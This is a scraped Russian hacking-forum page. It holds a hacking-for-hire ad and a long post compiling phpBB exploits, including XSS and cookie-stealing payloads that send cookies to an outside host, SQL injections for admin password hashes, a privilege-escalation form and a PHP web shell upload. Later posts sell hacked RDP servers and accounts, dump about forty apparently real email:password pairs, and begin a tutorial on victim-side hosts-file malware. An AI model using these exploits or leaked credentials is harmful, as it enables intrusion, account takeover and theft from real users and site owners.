║║ ─ ║║ ─ ║╚ ─ ╚═ ─ ╠╗






Почему именно у Acount.attack.hakkerСОБАКАgmail.com стоит заказать взлом?
1) В нашем сервисе работают только профессионалы, которые сделают работу в срок
2) Выполняем срочные заказы
3) Заключаем сделки только через проверенный и надежный гарант сервис
4) Гарантируем анонимность и конфиденциальность каждому клиенту
5) Имеем свои профессиональные методы и приемы при выполнении заказов
6) Гарантируем качество работы
7) Даем консультации каждому клиенту и предоставляем подробную инструкцию по использованию определенных приложений

Получить всё это вы можете, обратившись по адресу Acount.attack.hakkerСОБАКАgmail.com!

--------------------------------------------------------------------------------------------------------




#13 Все о phpBB x.xx, Уязвимости.

Написано Admin : 23 Ноябрь 2015 - 11:10

1.4.2 version: 
--
Cross Site Scripting:
Cross Site Scripting позволяет нападающим вставлять JavaScript код (и другой код HTML) в существующие сообщения. 
Пример:
{img}javascript:alert('This is the test'){/img}
--
 
1.4.4 version:
--
DoS и нарушение структуры базы данных:
Уязвимость существует в выполнении phpBB's BBcode ({code}{/code},{quote}{/quote},{list}{/list}).
Добавление строки ‘0000000’ внутри одного из этих тэгов, приведет к 100% потреблению ресурсов памяти и процессора на уязвимом сервере и к нарушении структуры базы данных.
Пример: 
1. {code}'0'*800{/code} 
2. {code}0{code}0{code}0{/code}0{/code}0{/code}
--
 
2.0.0 version:
--
Межсайтовый скриптинг: 
Уязвимость защиты в программе позволяет удаленным нападающим вставлять злонамеренный HTML и JavaScript код в существующие web-страницы внутри тэга IMG специальной конструкции:
 
{img}http://a.a/a"onerror="javascript:alert(document.cookie){/img}
--
Повышение привилегий:
Уязвимость позволяет пользователю с учетной записью "user" поднять свои привилегии до уровня "administrator", тем самым получая полный контроль над управлением форума. 
 
Ошибка присутствует в сценарии admin_ug_auth.php (используется для установления разрешения). Для просмотра защищенных страниц сценарий способен ограничить доступ непривилегированным пользователям, но он не производит такую проверку при отправлении назад данных. Демонстрационный код:
<html><head></head><body> <form method="post" action="http://domain_name/board_directory/admin/admin_ug_auth.php">User Level: <select name="userlevel"><option value="admin">Administrator</option><option value="user">User</option></select><input type="hidden" name="private[1]" value="0"><input type="hidden" name="moderator[1]" value="0"><input type="hidden" name="mode" value="user"><input type="hidden" name="adv" value="">User Number: <input type="text" name="u" size="5"><input type="submit" name="submit" value="Submit"> </form></body></html>
Далее отредактируйте действие формы в этом коде, измените местоположение admin сценария. Обычно, он находится в подкаталоге /admin/. Затем вызовите код в локальном окне браузера, и введите номер неадминистративного пользователя. Нажмите submit. При следующем заходе, вы получите права администратора.
--
 
2.0.2 version:
--
Административный доступ:
Обнаружена возможность изменения SQL запроса. Удаленный пользователь может получить хеш пароля администратора и, используя его, получить полный контроль над PHPbb системой. 
 
Уязвимость обнаружена в сценарии page_header.php.
Например, чтобы взломать user_id '40', запросите следующую страницу: 
 
forum_id=1+or+user_id=40+and+mid(user_password,1,1 )=char(97)/*[
 
В результате запрос будет выглядеть следующим образом: 
 
SELECT u.username, u.user_id, u.user_allow_viewonline, u.user_level, 
s.session_logged_in, s.session_ip FROM phpbb_users u, phpbb_sessions s WHERE 
u.user_id = s.session_user_id AND s.session_time >= 1035778374 AND s.session_page = 
1 or user_id=40 and mid(user_password,1,1)=char(97)/* ORDER BY u.username ASC, 
s.session_ip ASC
 
Имя администратора системы можно просмотреть вверху списка пользователей внизу страницы форума. Далее добавляя хеш пароля в куки, можно войти на сайт как администратор системы. Например, если user_id равен 32360, и хеш пароля - 6a204bd89f3c8348afd5c77c717a097a, то атакующий должен добавить следующее значение: 
a:2:{s:11:"autologinid";s:32:"
6a204bd89f3c8348afd5c77c717a097a";s:6:"userid";s:5 :"31360";} www.phpbb.com/ 1536 1063947136 29596959 197425936 29523534 *
Затем urlencode() это и поместите в куки с переменной 'phpbb2support_data', затем обратитесь к административной странице на phpbb сайте. Демонстрационный эксплоит: 
 
http://{target}/phpBB/prefs.php?HTTP_POST_VARS{save}
=1&passwd=asdfasdf&viewemail=0&savecookie=0&sig=0& smile=0&dishtml=0&disbbcode=0&themes =1?=/../../../var/logs/apache/access.log%00&save=1&user=admin&submit=Save%20Pref erences
--
2.0.3 version:
--
Выполнение произвольного PHP кода:
Уязвимость позволяет удаленному атакующему внедрить путь к 'extension.inc' в сценарии 'quick_reply.php'. В результате, атакующий может внедрить произвольный PHP сценарий из своего источника, который может использоваться для выполнения произвольных команд на Web сервере. Пример:
Создаем сценарий 'extension.inc' на удаленном сервере:
<?phpinclude('config'.'.php');echo "DB Type: $dbms <br>";echo "DB Host: $dbhost <br>";echo "DB Name: $dbname <br>";echo "DB User: $dbuser <br>";echo "DB Pass: $dbpasswd <br>";exit;?>
Затем запрос:
Раскроет содержание базы данных форума. 
--
Межсайтовый скриптинг:
Из-за недостаточной фильтрации ввода пользователя, удаленный атакующий может внедрить произвольный код сценария в сгенерированную страницу поиска. Уязвимость может использоваться для кражи опознавательных мандатов, хранящихся в куки. Пример:
<html> <body> <form method="post" name="search" action="http://target/search.php?mode=searchuser"> <input type="hidden" name="search_username" value=""/>  </form> <script> search.search_username.value='Http://savecookie/x.php?Cookie="><script>location=search.search_username.value+document.cookie;</script>'; document.search.submit(); </script> </body> </html> 
--
SQL Injection:
phpBB пользователь может посылать приватные сообщения другим пользователям. Обнаруженная уязвимость позволяет пользователю удалить текст всех приватных сообщений, сохраненных в системе.
 
Функция для удаления приватных сообщений уязвима к SQL инъекции. Если мы представляем данные, в которых мы хотим удалить приватное сообщение с номером ‘1) OR 1=1 #’, текст всех сообщений будет удален.
 
Сообщения хранятся в двух таблицах, и SQL инъекция будет воздействовать только на одну из них, так что будут удалены все тела сообщений, а темы и метаданные будут удалены, если они принадлежат текущему пользователю. Это означает, что темы удаленных сообщений все еще можно обнаружить в папках других пользователей. огда пользователь нажимает на такое удаленное сообщение, он будет переадресован назад к папке. 
 
Вы можете эксплуатировать это, отправляя(POST) следующее значение к privmsg.php?folder=inbox*sid = {SID}: 
 
mode=""
delete="true"
mark{}="1) OR 1=1 #"
confirm="Yes"
текущее значение SID можно увидеть в URL полях, если вы вошли в систему с отключенными куки.
--
 
2.0.5 version:
--
Межсайтовый скриптинг:
Удаленный пользователь может выполнить XSS нападение. 
Сообщается, что форум не фильтрует HTML код в переменной topic_id в сценарии viewtopic.php. Удаленный пользователь может сконструировать специально обработанный URL, содержащий произвольный HTML код, который будет выполнен в браузере пользователя, просматривающего эту ссылку, в контексте уязвимого сайта. Пример: 
http://{site}/phpBB/viewtopic.php?topic_id={script}
Уязвимость может использоваться для кражи опознавательных данных, хранящихся в куки целевого пользователя.
--
SQl инъекция:
Удаленный пользователь может выполнить нападение SQL инъекции. 
Сценарий 'profile.php' не проверяет переменую 'u'при отображении профиля пользователя. Удаленный пользователь может представить специально сформированный HTTP Get запрос, чтобы выполнить произвольные SQL команды на основной базе данных. 
Пример/Эксплоит: 
http://{target}/profile.php?mode=viewprofile&u='{sqlcode
--
 
2.0.5 version + MySQL 4:
--
SQL инъекция:
Уязвимость в проверке правильности ввода обнаружена в PHPbb. Удаленный пользователь может получить хеши паролей пользователей, включая администратора системы, и затем декодировать их. 
Сообщается, что сценарий viewtopic.php не проверяет данные, представленные пользователем в переменной $topic_id, перед выполнением SQL запроса. Удаленный атакующий может представить специально обработанное значение для этой переменной, чтобы выполнить дополнительный SQL запрос и получить произвольные данные их MySQL базы данных, включая MD5 хеши паролей пользователей форума, включая администратора системы.
 
Exploit: [here!] (2.0.5+MySQL4.perl.txt)
--
 
2.0.6 version:
--
Межсайтовый скриптинг:
Удаленный атакующий может вставить произвольный HTML код в тело сообщения. 
Удаленный атакующий может вставить специально отформатированный BB тэг (bbcode) {url}{/url}, чтобы заставить форум отобразить произвольный код сценария в браузере пользователя, просматривающего злонамеренное сообщение. 
Пример/Эксплоит: 
{url=www.somename.ru" onclick=alert('Hello')}text{/url}
{URL=http://www. somename.ru" onclick="alert'Hello'}text{/URL} 
{URL=www. somename.ru" onclick="alert'Hello'}text{/URL}
--
Межсайтовый скриптинг:
Удаленный авторизованный администратор может выполнить XSS нападение против других администраторов форума. 
Удаленный администратор может сконструировать специально обработанную smiley панель таким образом, чтобы выполнить произвольный код сценария в браузере другого администратора, просматривающего эту панель. 
Пример/Эксплоит: Поместите в smiley панель: 
 
<script>alert('Css work')</script>
 
--
SQL иньекция:
Удаленный пользователь может внедрить SQL команды, чтобы получить административный доступ к приложению. 
 
Как сообщается, сценарий 'search.php' не достаточно проверяет параметр 'search_id'. Удаленный пользователь может послать специально обработанное значение, чтобы выполнить произвольные SQL команды на целевом сервере, например, чтобы получить хэши паролей администратора. С хэшами паролей, удаленный пользователь может изменить свои куки, чтобы получить доступ к системе. Воздействие уязвимости зависит от версии используемой базы данных MySQL. 
 
Для определения уязвимости, выполните следующий запрос: 
 
Если ваша система уязвима, то запрос выдаст SQL ошибку: 
 
SQL Error : 1064 You have an error in your SQL syntax. Check the manual that 
corresponds to your MySQL server version for the right syntax to use near ' AND 
session_id = '9c9052fd135c0cefb31ec4b5124060f7'' 
 
SELECT search_array FROM phpbb_search_results WHERE search_id = 1 AND session_id
= '9c9052fd135c0cefb31ec4b5124060f7'
Line : 693
File : /usr/local/www/data/phpBB2/search.php
Эксплоит (боле подробное описание см. в источнике сообщения) (работает только в MySQL 4.x!): 
 
(97,58,55,58,123,115,58,49,52,58,34,115,101,97,114 ,99,104,95,114,101,115,117,108,116,
115,34,59,115,58,49,58,34,49,34,59,115,58,49,55,58 ,34,116,111,116,97,108,95,109,97,116,
99,104,95,99,111,117,110,116,34,59,105,58,53,59,11 5,58,49,50,58,34,115,112,108,105,116,
95,115,101,97,114,99,104,34,59,97,58,49,58,123,105 ,58,48,59,115,58,51,50,58,34)
,user_password,char(34,59,125,115,58,55,58,34,115, 111,114,116,95,98,121,34,59,105,58,48,
59,115,58,56,58,34,115,111,114,116,95,100,105,114, 34,59,115,58,52,58,34,68,69,83,67,34,59,
115,58,49,50,58,34,115,104,111,119,95,114,101,115, 117,108,116,115,34,59,115,58,54,58,34,116,111,112
,105,99,115,34,59,115,58,49,50,58,34,114,101,116,1 17,114,110,95,99,104,97,114,115,34,59,
105,58,50,48,48,59,125))%20from%20phpbb_users%20wh ere%20user_id={id}/*
--
SQL инъекция:
Удаленный авторизованный модератор может внедрить произвольные SQL команды. 
 
Сообщается, что функция 'groupcp.php' не проверяет правильность данных, представленных пользователем в $sql_in переменной. Удаленный авторизованный пользователь с 'moderator' привилегиями может представить специально обработанный URL, чтобы выполнить произвольные команды на целевом сервере.
--
Sql инъекция:
Уязвимость обнаружена в phpBB в 'search.php'. Удаленный пользователь может выполнить произвольные SQL команды. 
 
Уязвимость обнаружена в 'search.php' в параметре 'show_results', кода переменная $show_results не установлена к 'posts' или 'topics'.
 
Exploit: [here!] (2.0.6.perl.txt)
--
 
2.0.6c version:
--
Межсайтовый скриптинг:
Уязвимость обнаружена в phpBB в 'viewtopic.php'. Удаленный пользователь может выполнить XSS нападение. 
Уязвимость обнаруженав параметре 'postorder' в сценарии 'viewtopic.php'. Пример: 
 
%22%3E%3C%73%63%72%69%70%74%3E%61
%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6 F%6B%69%65%
--
 
2.0.6d version:
--
Межсайтовый скриптинг:
Уязвимость обнаружена в phpBB в 'viewtopic.php' и 'viewforum.php'. Удаленный пользователь может выполнить XSS нападение. 
viewforum.php?f={FNUM}&topicdays={DNUM}{XSS}
viewforum.php?f=1&topicdays=99"><script>alert(docu ment.cookie)</script>&star t=30
viewtopic.php?t=10&postdays=99"><script>alert(docu ment.cookie)</script>&start=20
--
Межсайтовый скриптинг:
Уязвимость обнаружена в phpBB в 'profile.php'. Удаленный пользователь может выполнить XSS нападение. 
 
Пример/Эксплоит:
-------------exploit.htm--------------<form name='f' action="http://site/profile.php?mode=editprofile" method="post"><input name="avatarselect" value='" ><script>alert(document.cookie)</script>'><input type="submit" name="submitavatar" value="Select avatar"></form><script>window.onload=function(){document.all.submitavatar.click();}</script>---------------end-------------------
2.0.7a version:
--
Sql инъекция:
Удаленный авторизованный администратор может внедрить SQL команды. Удаленный пользователь может выполнить XSS нападение. 
Пример: 
admin_smilies.php?mode=edit&id=99 UNION SELECT 0,username,0,user_password FROM othersite_phpbb_users WHERE user_id=2
и еще: 
admin_smilies.php?mode=edit&id={SQL}
admin_ smilies.php?mode=delete&id={SQL}
admin_smilies.php?mode=edit&id={XSS}
admin_smilies.php?mode=delete&id={XSS}
admin_styles.php?mode=edit&style_id={SQL}
admin_styles.ph p?mode=delete&style_id={SQL}
admin_styles.php?mode=edit&style_id={XSS}
admin_styles.php?mode=delete&style_id={XSS}
Также сообщается, что множество сценариев не проверяют ID сессии. В результате удаленный пользователь может внедрить phpBB команды в тело сообщения, которые будут выполнены в браузере целевого пользователя, просматривающего сообщение форума.
--
 
2.0.8 version:
--
Sql инъекция:
Уязвимость в проверке правильности входных данных обнаружена в 'privmsg.php' сценарии. Удаленный пользователь может внедрить произвольный SQL код. 
 
Пример: 
pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20username,null,
user_password,null,null,null,null,null,null,null,n ull,null,null,null,null,null,null,null
,null,null,null,null,null,null,null,null,null,null ,null,null,null FROM phpbb_users WHERE user_level=1 LIMIT 1/* 
/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_u ser=AND pm.privmsgs_type=-99 UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username,0 ,0,0,0,0,0,0,0,0,user_password FROM phpbb_users WHERE user_id=2 LIMIT 1/*
--
Раскрытие пути:
 
 
 
 
--
XSS:
in "index.php":
 
{cat_id}=1&category_rows{0}{cat_title}=waraxe<scri pt>alert(document.cookie);</script>&category_rows{0}{cat_order}=99
 
in "languagelang_englishlang_faq.php":
 
http://localhost/phpbb208/faq.php?faq{0}{0...document.cookie );</script>bar&faq{0}{1}=waraxe
 
in "languagelang_englishlang_bbcode.php ":
 
{0}=f00<script>alert(document.cookie);</script>bar&faq{0}{1}=waraxe
--
 
2.0.8а version:
--
Спуфинг IP адресов:
Удаленный пользователь может подделать свой IP адрес, который будет зарегистрирован приложением. 
 
Удаленный пользователь может сконструировать специально обработанный 'X-Forwarded-For' HTTP заголовок, чтобы подменить свой реальный IP адрес произвольным IP адресом. 
 
В результате удаленный пользователь может обойти ограничения доступа к приложению по IP адресу.
--
 
2.0.10 version:
--
Межcайтовый скриптинг и Response Splitting Attacks:
Уязвимость позволяет удаленному пользователю выполнить XSS нападение. 
 
1. Сценарий /phpBB2/search.php' не фильтрует HTML код в поле 'search_author'. Пример: 
 
search_author=%27%3Cscript%3Ealert(document.cookie )%3C/script%3E
 
Также сообщается, что phpBB уязвим к HTTP Response Splitting нападениям (как описано в 
http://www.sanctumin.....PResponse.pdf). Удаленный пользователь может отравить еш web прокси. Уязвимы сценарии '/phpBB2/privmsg.php' и '/phpBB2/login.php'. Пример запроса: 
 
POST /phpBB2/login.php HTTP/1.0
Host: SERVER
User-Agent: Mozilla/4.7 {en} (WinNT; I)
Accept-Encoding: gzip
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8
Content-Type: application/x-www-form-urlencoded
Content-length: 129
 
logout=foobar&redirect=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTT
P/1.0%20200%20OK%0d%0aContent-Length:%207%0d%0a%0d%0aGotcha!
 
Еще пример: 
GET /phpBB2/privmsg.php?mode=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.0%20200
%20OK%0d%0aContent-Length:%207%0d%0a %0d%0aGotcha!
HTTP/1.0
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.7 {en} (WinNT; I)
Host: SERVER
--
SQL-инъекция и php инклудинг:
Удаленный атакующий может выполнить произвольный SQL команды и php код на уязвимой системе. 
Уязвимость существует при обработке спецсимволов в строке URL. Удаленный атакующий может выполнить SQL-инъекцию и произвольный php-сценарий на уязвимой системе. Пример:
 
viewtopic.php?t=1&highlight=%2527
 
Exploit: [here!] (2.0.10.perl.txt)
Exploit: [here!] (2.0.10-2.perl.txt)
--
Межсайтовое выполнение сценариев:
Удаленный атакующий может получить доступ к важным данным пользователей.
Уязвимость существует из-за некорректной обработки входных данных переменной 'username'. Удаленный атакующий может создать сообщение, которое при просмотре выполнить произвольный HTML код в браузере жертвы.
--
 
2.0.11 version:
--
Просмотр и удаление произвольных файлов:
Уязвимость форуме позволяет удаленному пользователю раскрыть содержание и удалять (unlink) произвольные файлы на системе с привилегиями Web сервера. 
Уязвимость в phpBB в нескольких сценариях, отвечающих за обработку аватаров (usercp_avatar.php, usercp_viewprofile.php и usercp_register.php) позволяет удаленному пользователю контролировать параметры, переданные функции unlink().
--
 
2.0.12 version:
--
Удаленный административный доступ:
Уязвимость позволяет удаленному пользователю обойти некоторые ограничения безопасности и получить административные привилегии на форуме. 
Уязвимость связана с ошибков в сравнении "sessiondata{'autologinid'}" и "auto_login_key". В результате возможно получить административные привилегии на форуме. Логическая уязвимость обнаружена в сценарии includes/sessions.php в следующей строке: 
 
if( $sessiondata{'autologinid'} == $auto_login_key )
Условие выполняется, если длина $sessiondata{'autologinid'}, представленная в куки пользователя, равна длине переменной $auto_login_key. Для исправления уязвимости ее необходимо заменить на строку: 
 
if( $sessiondata{'autologinid'} === $auto_login_key )
Также сообщается об ошибке в "viewtopic.php", которая позволят раскрыть инсталляционный путь.
 
Exploit: [here!] (2.0.12.c.txt)
--
 
2.0.13 version:
--
XSS-атака в сценарии usercp_register.php:
Уязвимость позволяет удаленному пользователю произвести межсайтовый скриптинг и получить доступ к важным данным пользователей.
Уязвимость обнаружена в сценарии 'usercp_register.php' из-за недостаточной обработки входных данных в перемененных 'allowhtml', 'allowbbcode', и 'allowsmilies' в подписи пользователя. Злоумышленник может послать частное сообщение со специально обработанной подписью, чтобы выполнить произвольный HTML сценарий в браузере целевого пользователя.
--
Раскрытие установочной директории:
Уязвимость позволяет злоумышленнику получить информацию об установочной директории приложения на сервере. 
 
Уязвимость существует в сценарии 'phpBB/db/oracle.php'. Удаленный пользователь может непосредственно вызвать уязвимый сценарий и получить информацию об установочной директории приложения на сервере.
--
Получение административных привилегий:
 
Exploit: [here!] (2.0.13-admin.c.txt)
--
Получение хеша паролей:
 
Exploit: [here!] (2.0.13.perl.txt)
--
Загрузка произвольных файлов:
Уязвимость позволяет удаленному пользователю загрузить произвольный файл на сервер.
Уязвимость существует в сценарии up.php из-за некорректной проверки расширений файлов. Удаленный авторизованный пользователь может загрузить произвольный php файл и выполнить его с привилегиями web сервера.
 
Пример Эксплоита:
<?system($cmd)?>
Сохраняем как cmd.php
Открываем http://target/phpbb/up.php
И загружаем наш код.
Его можно увидеть http://targey/phpbb/uploads/cmd.php
Запуская видим:
Warning: system(): Cannot execute a blank command in /home/target/public_html/forum/uploads/tetx.php on line 2
Следовательно мы можем выполнить NIX команды с привеленгиями веб сервера.
--
 
2.0.15 version:
--
Межсайтовый скриптинг в при обработке BBCODE URL:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других пользователей.
Уязвимость обнаружена при обработке BBCODE URL в сценарии bbcode.php. Удаленный пользователь может с помощью специально сформированного сообщения выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Примеры:
 
{url=javascript://%0ASh=alert(%22CouCou%22);window.close();}Alert box with "CouCou"{/url} 
{url=javascript://%0ASh=new%20ActiveXObject(%22WScript.shell%22);
Sh.regwrite(%22HKCU%5C%5CQQQQQ
%5C%5Cqq%22,%22CouCou%22);window.close();}Create registry entry: HKCUQQQQQqq = "CouCou"{/url}
 
{url=javascript://%0Awindow.opener.document.body.innerHTML
=window.opener.document.body.innerHTML.replace(%27 Hi%20Paul%27,%27Hi%20P.A.U.L%27);
window.close();}Modify opener page: Paul -> P.A.U.L{/url}
--
Регистрация множества юзеров. Отказ в обслуживание:
 
Exploit: [here!] (2.0.15-DOS.c.txt)
--
Выполнение произвольного PHP сценария в phpBB в коде highlighting: (update time:02.07.05)
Пример:
Позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.
Уязвимость существует из-за некорректного использования функции preg_replace() в сценарии 'viewtopic.php' при обработке входных данных. Удаленный пользователь может с помощью специально сформированного запроса заставить приложение интерпретировать входные данные как PHP сценарий и выполнить его. 
 
Exploit: [here!] (2.0.15.perl.txt)
 
2.0.19 version:
--
Раскрытие данных:
Уязвимость существует из-за того, что ID сессии включается в заголовок HTTP "Referer" при отправке запросов внешние аватары или при создании ссылок на внешние сайты. Злоумышленник может заставить администратора просмотреть профиль пользователя, содержащий внешний аватар, и получить ID сессии администратора. Для удачной эксплуатации уязвимости необходимо, чтобы использование внешних аватаров было разрешено на сайте (не является значением по умолчанию). 
Примеры:
 
http://[HOST]/[DIR]/admin/admin_users.php?sid=88eafcce6dddcee3fccc08de7ec505d0
http://[HOST]/[DIR]/modcp.php?t=2&mode=split&sid=c1db64124b7ced0668dec5900fed3b35
--
XSS:
В admin/admin_smilies.php вы можите изменять / создавать смайлы. Нечего особенного но phpBB не проверят что происходит в БД.
$smile_code = ( isset($HTTP_POST_VARS['smile_code']) ) ? $HTTP_POST_VARS['smile_code'] : $HTTP_GET_VARS['smile_code'];$smile_url = ( isset($HTTP_POST_VARS['smile_url']) ) ? $HTTP_POST_VARS['smile_url']: $HTTP_GET_VARS['smile_url'];$smile_url = phpbb_ltrim(basename($smile_url), "'");$smile_emotion = ( isset($HTTP_POST_VARS['smile_emotion']) ) ? $HTTP_POST_VARS['smile_emotion'] : $HTTP_GET_VARS['smile_emotion'];$smile_code = trim($smile_code);$smile_url = trim($smile_url);$smile_emotion = trim($smile_emotion); // If no code was entered complain ...if ($smile_code == '' || $smile_url == ''){message_die(GENERAL_MESSAGE, $lang['Fields_empty']);} //// Convert < and > to proper htmlentities for parsing.//$smile_code = str_replace('<', '<', $smile_code);$smile_code = str_replace('>', '>', $smile_code); //// Save the data to the smiley table.//$sql = "INSERT INTO " . SMILIES_TABLE . " (code, smile_url, emoticon)VALUES ('" . str_replace("'", "''", $smile_code) . "', '" . str_replace("'", "''", $smile_url) . "', '" . str_replace("'", "''", $smile_emotion) . "')";$result = $db->sql_query($sql);
Примеры:
 
http://[HOST]/[DIR]/admin/admin_smilies.php?mode=savenew&smile_code=:x:&smile_url=icon_mrg
reen.gif&smile_emotion=c" onmouseover="alert('SecurityReason.Com')" &sid=SIDofADMIN
 
http://[HOST]/[DIR]/admin/admin_smilies.php?mode=savenew&smile_code=:h:&smile_url=icon_mrg
reen.gif"%20onmouseover='alert("SecurityReason.Com")'%20&sid=SIDofADMIN
 
http://[HOST]/[DIR]/admin/admin_smilies.php?mode=savenew&smile_code=:q:&smile_url=icon_mrg
reen.gif"%20onmouseover="alert(document.location='http://[SRVER]/cookies?'+document.co
okie)"%20&sid=SIDofADMIN
--
Узявимость в в генераторе случаных чисел:
При восстановление пароля пользователь вводит е-маил и имя пользователя.phpBB генерирует id подтверждения
/includes/usercp_sendpasswd.php line 51"$user_actkey = gen_rand_string(true);" and than generate a password.  /includes/usercp_sendpasswd.php line 55"$user_password = gen_rand_string(false);"
Id подтверждения отсылаеться на е-маил с сылкой по которой должен проследовать пользователь для подтверждения. Давайте посмотрим на gen_rand_string() функцию:
/profile.php line 61function gen_rand_string($hash){$chars = array( 'a', 'A', 'b', 'B', 'c', 'C', 'd', 'D', 'e', 'E', 'f', 'F', 'g', 'G', 'h', 'H', 'i', 'I', 'j', 'J', 'k', 'K', 'l', 'L', 'm', 'M', 'n', 'N', 'o', 'O', 'p', 'P', 'q', 'Q', 'r', 'R', 's', 'S', 't', 'T', 'u', 'U', 'v', 'V', 'w', 'W', 'x', 'X', 'y', 'Y', 'z', 'Z', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0'); $max_chars = count($chars) - 1;srand( (double) microtime()*1000000); $rand_str = '';for($i = 0; $i < 8; $i++){$rand_str = ( $i == 0 ) ? $chars[rand(0, $max_chars)] : $rand_str . $chars[rand(0, $max_chars)];} return ( $hash ) ? md5($rand_str) : $rand_str;
зная, что PRNG's действительно не случаен, и что данный те же самые, PRNG произведет те же самые случайные числа, мы можем безопасно предположить это из-за "srand( (double) microtime()*1000000); " то число всегда будет от 1 до 999,999. Также знание, что пароль сгенерирован прямо после получения id подтверждения, как только мы получаем id подтверждения, индексное микровремя, используемое, чтобы отобрать поколение пароля не будет слишком далеко, чем микровремя имело обыкновение отбирать id подтверждения. Самое плохое в этом сценарии атаки - то, что Вы должны будете послать 1мил запросов на сброс пароля , нападавший может однако снизить этот показатель к диапазону 100 КБ, если он с умеет синхронизировать, время посылки запросы со временим на сервере, А оно отображаетсья на каждой главной странице любого форума. 
 
[phpbb - нападение]
 
Я написал 3 программы, ту, которая создовала произвольные пароли и таблицы id подтверждений , ту, которая посылала GET запросы для активизации смены пароля и последнию, которая использовала список паролей, чтобы сделать нападение по словарю на учетную запись phpbb. Испытательный сайт, который я решил использовать, останется анонимным (я был забанен!) После производства id подтверждения и паролей, я решил пробовать сбросить мою собственную учетную запись. Я запросил изменение пароля к моей собственной учетной записи. Я немедленно запустил мою вторую программу, чтобы послать id's подтверждения, которые были усечены, чтобы иметь только 6 символов (длина используемую на сервере). 
 
После 40 минут программа пометила это, это сумело сбросить пароль, и это выводило id подтверждения, который активизировал изменение пароля. Я взял id подтверждения, открыл мою таблицу и узнал, что логин проверки правильности был в индексе 117312 (мне повезло , могло, были и больше). Я открыл таблицу паролей, удалил все перед индексом 117312 и все после индекса 120000,получилс список в 2688 пароля. Я запустил мою заключительную программу, используя список паролей. Я получил новый пароль в течение 10 секунд, это было в индексе 117490, что означает, что чтобы произвести id подтверждения надо примерно 178.



#1243 Магазин Онлайн!

Написано Opasniy : 15 Август 2016 - 09:35

Доброго времени суток !

Лучший Магазин Аккаунтов и много другова !
9f3773b9eae2.gif



#460 Анонимное подключение к сети при помощи VPN (создай свой канал)

Написано PLAY : 06 Июнь 2016 - 10:33

Всем здравствуйте, увидел новый раздел для безопасной работы и решил написать тоже тему о работы при помощи VPN.
VPN сервис
— Реализуйте свое право на свободу слова в сети!

С помощью данного приложения бы сможете:

Скрыть историю интернет активности.
Защитить конфиденциальные данные.
Уйдёте от ограничений и цензуры.
Есть как тестовые (Бесплатные версии), так и платные для более опытных пользователей или хакеров,
которые понимают что да, как и зачем.Заходим скачиваем и открываем себе мир интернета без границ и ограничений.

Заходите, смотрите, выбирайте свой аппарат и качайте, защиты качественнее и проще для пользователей, вам просто не найти.
https://vpnmonster.ru/#price
Многие боятся скачивать что либо, по каким-то своим соображениям.
Но я уверяю вас проблем с (открытым каналом) не будет.
Возьмите в пример любой сайт, который закрыт в России или любой другой стране мира по решению суда и попробуйте его открыть, вам этого сделать не удастся.
А теперь, Откройте программу, подключитесь к VPN и после попробуйте открыть сайт снова. Рассмотрим пример обычных сайтов далеко ходить не будет, сайты о наркотиках почти все в реестре запрещенных сайтов в России, при помощи vpn открываются даже они.
Пример подобрал самый простой что далеко не ходить, на самом деле таких сайтов множество, пример пиратское видео, пиратские программы и прочие.
vpn это работа в сети с айпи адресом якобы с Франции США и прочих стран, тоесть бы будете определяться как пользователь из другой страны.
Вообщем заходите, смотрите и пользуйтесь.
https://vpnmonster.ru/#price
Выбирайте платформу которая вам подходит. Просто как раз, два, три.


#26939 продажа дедиков

Написано ant-djs : 26 Октябрь 2018 - 05:44

магазин дедиков купить дедик купить рдп купить rdp купить дедик vnc купить туннели ssh buy rdp buy dedicated
http://rdpsocks.ru
Онлайн магазин дедиков низкие цены!! 
http://rdpdedic.ru




#269 Свежая пачка майл

Написано Admin : 28 Февраль 2016 - 10:45

taran_natalia@mail.ru;260387
salatoff_86@mail.ru;05111986
4ek45@mail.ru;181163
pidometr@mail.ru;230885
irina_igrineva@mail.ru;qwerty
hjvfyabkbggjd@mail.ru;05121979
yt1eotju@bk.ru;qwerty
piniava@mail.ru;piniava
1231eqwe13@mail.ru;qwerty
cvbm12@mail.ru;qwerty
lilechikvolkowa@mail.ru;07051990
bogdanova1502@mail.ru;15021968
roma311986@mail.ru;qwerty
ukraine147@mail.ru;qwerty
sdgdsfhgdrgthgfhfdh@mail.ru;qwerty
granny_sa@mail.ru;210194
lazareva17777@mail.ru;080973
amigos_aipet@mail.ru;qwerty
lilya_doktor@mail.ru;060879
nikkl90-90@mail.ru;200790
sanya_23_93@inbox.ru;23081993
nikulina-65@mail.ru;10091965
skomorohina@mail.ru;skomorohina
ambal666@list.ru;05101995
kireev-vova@mail.ru;270680
05ruslan90@mail.ru;060290
lech18@mail.ru;qwerty
roma.shevchuk@list.ru;101283
ualihanov.gu@mail.ru;qwerty
thuongtula@mail.ru;26071985
boris.brutal@list.ru;qwerty
967173@mail.ru;qwerty
ljvhbcnrf@mail.ru;ljvhbcnrf
olesya-bogus@mail.ru;17121981
saneok__91@mail.ru;280391
kwotyan@mail.ru;kwotyan
tanyaef@mail.ru;tanyaef
troyanskaya_79@mail.ru;260579
svetlana.kotova@bk.ru;17011975



#26206 Услуги хакера, взлом, тайная слежка.

Написано Ozzy : 22 Июнь 2018 - 09:37

Ты тот кого искал :) Щас залечу к почту


  • Это нравится: Ozzy


#241 Блокиратор вконтакте

Написано Admin : 28 Февраль 2016 - 08:35

Добрый день, сейчас опишу метод блокировки вконтакте средствами Delphi. Главное преимущество нашей идеи состоит в том, что она не требует хостинга. 
 
 
Наша программка будет редактировать всем известный файл hosts и поднимать на компьютере жертвы собственный http-сервер, таким образом компьютер жертвы и будет хостом для сайта, на который будет прописан редирект в хостс. 
Нам потребуется 
 
[1] Delphi 7 
[2] Установленная библиотека Indy 
 
